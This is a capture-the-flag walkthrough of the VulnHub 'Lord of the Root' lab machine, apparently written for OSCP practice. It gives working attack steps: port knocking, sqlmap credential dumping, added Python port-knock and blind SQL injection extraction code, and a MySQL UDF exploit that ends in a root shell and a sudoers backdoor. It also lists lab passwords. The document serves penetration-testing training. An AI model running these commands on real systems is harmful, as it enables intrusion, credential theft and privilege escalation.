This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. It is the next one on the list and can be downloaded from VulnHub.
The challenge or goal of the machine is described as follows:
"This is a boot-to-root machine will not require any guest interaction."
https://www.vulnhub.com/entry/lord-of-the-root-101,129/
The walkthrough is divided into a couple of sections following the standard penetration-testing process: Information gathering -> Exploitation -> Post exploitation. It could be divided into more steps, but for simplicity we use these three.
To start off, we find the IP address of the machine with nmap, since netdiscover takes a while on my VMware. We use the command
sudo nmap -sn 192.168.0.0/24 for this (a ping sweep only, no port scan). The vulnerable machine has the IP 192.168.0.136.
Next we scan the machine for open ports with nmap. We do two scans:
sudo nmap -sV -sC 192.168.0.136 -oA nmap and
sudo nmap -sV -sC 192.168.0.136 -p- -oA fullnmap. We use these parameters for:
-sV service and version enumeration,
-sC the default script set,
-p- all 65535 TCP ports instead of nmap's default top 1000,
-oA saving the output in all three formats (normal, grepable and XML) at once.
The nmap results are:
So only the SSH service is open. When we SSH to the server with ssh
192.168.0.136 to get the banner, it shows us LOTR and "knock friend to enter".
I did this machine before and it was annoying; I could not do it. But I remember that we have to use a scanning tool that knocks on ports 1, 2 and 3 in this order. So I scanned the machine a couple of times with
nmap -r -p 1,2,3 192.168.0.136. The -r makes nmap probe the ports sequentially instead of in its default random order (a knock daemon only accepts the sequence if the SYNs arrive in the right order), and -p specifies ports 1, 2 and 3.
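The same knock with plain sockets, as an added example (this is not the walkthrough's own code). A knock daemon only needs to see a SYN on each port, so a refused connection is still a knock; what matters is the order, which is why -r is needed with nmap and why scanning "a couple of times" helps when nmap's parallel probing reorders them. The connect and pause parameters exist only so the sequence can be exercised offline against the constructed FakeKnockDaemon below; the defaults use real TCP. The host 10.0.0.1 and hidden port 1337 in the demo are assumptions.

```python
"""Ordered port knocking with sockets, plus an offline stand-in for knockd."""
import socket
import time
from typing import Callable, List, Sequence, Tuple

Connector = Callable[[str, int, float], bool]


def tcp_connect(host: str, port: int, timeout: float) -> bool:
    """One TCP connect attempt.  Returns True only if something accepted it;
    refused or timed out still delivered the SYN, which is all a knock needs."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # ConnectionRefusedError and socket.timeout are subclasses
        return False


def knock(host: str, sequence: Sequence[int], *, delay: float = 0.3,
          timeout: float = 1.0, connect: Connector = tcp_connect,
          pause: Callable[[float], None] = time.sleep) -> List[Tuple[int, bool]]:
    """Hit each port in `sequence`, strictly in order, pausing so the daemon
    registers one knock before the next arrives.  Returns (port, accepted)."""
    results = []
    for port in sequence:
        results.append((port, connect(host, port, timeout)))
        pause(delay)
    return results


def knock_then_probe(host: str, sequence: Sequence[int], target: int, *,
                     delay: float = 0.3, timeout: float = 1.0,
                     connect: Connector = tcp_connect,
                     pause: Callable[[float], None] = time.sleep) -> bool:
    """Knock, then report whether the hidden service on `target` now accepts."""
    knock(host, sequence, delay=delay, timeout=timeout, connect=connect, pause=pause)
    return connect(host, target, timeout)


class FakeKnockDaemon:
    """Constructed model of a knock daemon so the logic runs offline: the hidden
    port answers only after the whole sequence was hit in order; a port out of
    sequence resets the progress (restarting on the first port is honoured)."""

    def __init__(self, sequence: Sequence[int], hidden_port: int) -> None:
        self.sequence = list(sequence)
        self.hidden_port = hidden_port
        self.progress = 0
        self.opened = False
        self.hits: List[int] = []

    def connect(self, host: str, port: int, timeout: float) -> bool:
        self.hits.append(port)
        if port == self.hidden_port:
            return self.opened
        if port == self.sequence[self.progress]:
            self.progress += 1
            if self.progress == len(self.sequence):
                self.opened, self.progress = True, 0
        else:
            self.progress = 1 if port == self.sequence[0] else 0
        return False  # the knock ports themselves never accept


if __name__ == "__main__":
    daemon = FakeKnockDaemon([1, 2, 3], hidden_port=1337)  # assumed hidden port
    no_pause = lambda _: None
    # Wrong order (what an unordered scan may send): 1337 stays closed.
    print(knock_then_probe("10.0.0.1", [3, 2, 1], 1337, connect=daemon.connect, pause=no_pause))
    # Correct order: 1337 opens.
    print(knock_then_probe("10.0.0.1", [1, 2, 3], 1337, connect=daemon.connect, pause=no_pause))
```

Against the real box, drop the connect and pause arguments: knock_then_probe("192.168.0.136", [1, 2, 3], 1337) sends the three SYNs in order and then tells you whether 1337 accepts, which is the same check as the second full port scan.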
After that we did another full port scan and found the following results:
An Apache web server on port 1337. Let's start our vulnerability scanner nikto and our directory brute-forcer dirb:
nikto -host http://192.168.0.136:1337 -output=nikto.txt and
dirb http://192.168.0.136:1337 -o dirb.txt.
Dirb only found a couple of directories:
The main web page shows us a meme:
Nothing interesting in the HTML source:
In the /images/ directory three memes are present: the one we saw earlier and two others, again with nothing of interest. For the page
/server-stat we get a 403 Forbidden response.
Nikto shows us the web server is running an old Apache version on Ubuntu.
I went to the browser and manually checked the
/robots.txt file. There is an image. So I checked the source code and found the following:
An encoded string. It might be a hash, so I checked it with
hash-identifier, which tells us it might be a Tiger-192 or HAVAL-192 hash.
I could not find the hash value; maybe it's just encoded. So I ran it through some things like ROT1-24 and Base64, and it was base64 encoded. (hash-identifier only guesses by length and alphabet; a hex digest never contains mixed case, '+', '/' or '=' padding, so a string with those is an encoding, not a hash.) You can decode base64 in the terminal with the
base64 -d command.
It gave us a web path. If you browse to this page it gives you a login screen.
So I tried some basic SQL injections in the login form, but they didn't work, like
' or 1=1# and
' or 1=1 --. We don't have any other entry points on the vulnerable machine: no other ports, no other web pages. So I booted up sqlmap. To use it easily we start Burp, fill in the form and save the request to a file named Request (right-click the request and choose "save item").
This file can then be given to sqlmap instead of setting the URL, the POST parameters and the method by hand. So I ran sqlmap with the following command:
sqlmap -r Request --dbs --level=4 --risk=2 (the higher --level and --risk widen the set of injection points and payloads sqlmap tries), and it found a vulnerable parameter and gave us the following four databases:
So we want to find out what is in the Webapp database. We can use the following command to select the Webapp database and list its tables:
sqlmap -r Request --dbs --level=4 --risk=2 -D Webapp --tables. It gave us one table, named Users.
Let's select this table and see what is in there:
We got three columns: id, password and username. We can use the following command to dump both the usernames and the passwords:
sqlmap -r Request --dbs --level=4 --risk=2 -D Webapp -T Users -C username,password --dump. It gave us the following accounts:
gimli:AndMyAxe
legolas:AndMyBow
aragorn:AndMySword
frodo:iwilltakethering
smeagol:MyPreciousR00t
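Why the tautology failed while sqlmap still found the parameter injectable, as an added example (not the box's login.php, whose code we never saw). It builds an in-memory SQLite copy of the Users table from the dump above and shows two ways of writing the login: one where ' or 1=1 -- logs you straight in, and one that builds the query just as unsafely but compares the password in application code afterwards, so the tautology only yields "wrong password". The second is still fully injectable: the distinct "unknown user" / "wrong password" responses are a boolean oracle, and the extraction loop pulls a password out through it character by character, which is what sqlmap's boolean-based blind technique does. The parameterised version is the fix. The schema, the response strings and the oracle design are assumptions made for the example; SQLite treats -- as a comment like MySQL does, but not #.

```python
"""Tautology bypass, a post-check login that defeats it, blind extraction
through the remaining oracle, and the parameterised fix."""
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed copy of the dumped Users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO Users (username, password) VALUES (?, ?)", [
        ("gimli", "AndMyAxe"), ("legolas", "AndMyBow"), ("aragorn", "AndMySword"),
        ("frodo", "iwilltakethering"), ("smeagol", "MyPreciousR00t"),
    ])
    return con


def login_concat(con, username: str, password: str) -> bool:
    """Vulnerable: both inputs are spliced into the query and any returned
    row counts as a login, so `' or 1=1 --` in the username is enough."""
    sql = ("SELECT id, username, password FROM Users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(sql).fetchone() is not None


def login_concat_then_compare(con, username: str, password: str) -> str:
    """Still vulnerable (username spliced in), but the password is compared in
    Python, so the tautology returns a row whose password does not match."""
    sql = f"SELECT id, username, password FROM Users WHERE username = '{username}'"
    row = con.execute(sql).fetchone()
    if row is None:
        return "unknown user"
    if row[2] != password:
        return "wrong password"
    return "ok"


def login_parameterized(con, username: str, password: str) -> str:
    """Fixed: placeholders make the input data, never SQL."""
    row = con.execute("SELECT id FROM Users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()
    return "ok" if row else "unknown user"


def blind_extract_password(con, target_user: str, max_len: int = 64,
                           charset: str = string.ascii_letters + string.digits) -> str:
    """Boolean-based blind extraction against login_concat_then_compare.
    True condition -> the target's row comes back -> "wrong password";
    false condition -> no row -> "unknown user".  SQLite's default BINARY
    collation makes `=` case-sensitive, so case is recovered exactly."""
    def oracle(condition: str) -> bool:
        payload = f"{target_user}' AND ({condition}) --"
        return login_concat_then_compare(con, payload, "x") == "wrong password"

    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(f"substr(password, {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            break  # no candidate matched: past the end of the string
    return recovered


if __name__ == "__main__":
    con = make_db()
    print(login_concat(con, "' or 1=1 --", "x"))               # True
    print(login_concat_then_compare(con, "' or 1=1 --", "x"))  # wrong password
    print(login_parameterized(con, "' or 1=1 --", "x"))        # unknown user
    print(blind_extract_password(con, "smeagol"))              # MyPreciousR00t
```

The lesson for the manual test is that a failed tautology says nothing about whether the parameter is injectable; if two inputs produce distinguishable responses, the query is already under your control, and sqlmap's --level/--risk sweeps are there to find exactly that kind of difference.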
So I tried SSH'ing into the server with these accounts and could only log in with smeagol.
While looking around for a privilege-escalation technique I saw that multiple services are running as root: Apache, MySQL and so on. A MySQL daemon running as root is the weakness we use here, because anything MySQL can be made to execute runs as root too.
In the web directory /var/www/978345210 we found the file login.php containing MySQL credentials.
I also checked if we could write anything to these folders or files, but unfortunately we could not. That would have been an easy reverse shell ^^ With the command
mysql -u root -p and the password darkshadow we could log in to the MySQL database as its root user. I stopped sqlmap, which had been dumping the other databases in the meantime. So I found an exploit we can use to get root access: a user-defined function (UDF) that calls system() from inside mysqld.
So let's do this exploit. First we download it with
wget https://www.exploit-db.com/raw/1518. Following the commented steps inside the exploit, it is easier to rename it to
raptor_udf2.c. Compile the exploit into a shared library:
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc, then log back in to the database with
mysql -u root -p and the password darkshadow. The library is read from smeagol's home directory with load_file and written into MySQL's plugin directory with dumpfile; if the path below does not work, the plugin_dir variable tells you where mysqld expects plugins, and a non-empty secure_file_priv setting would block this read/write step altogether. Then we issue the following MySQL commands:
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root)
mysql> select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers');
mysql> exit
Bye
smeagol@LordOfTheRoot:~$ sudo su
root@LordOfTheRoot:/home/smeagol# id && whoami
uid=0(root) gid=0(root) groups=0(root)
root
root@LordOfTheRoot:/home/smeagol#
The chown raptor.raptor part is copied from the exploit's own usage example and is not needed; the id command before the semicolon runs regardless, and its output proves the UDF executes as root.
Damn, the MySQL priv esc took me some time, way longer than expected. But I had to figure out how it worked to get it working, and I found some errors on the way while doing "create function do_system returns integer soname 'raptor_udf2.so';". It all worked when I did it in smeagol's home directory instead of /tmp. I even had to reset the machine two times to start over.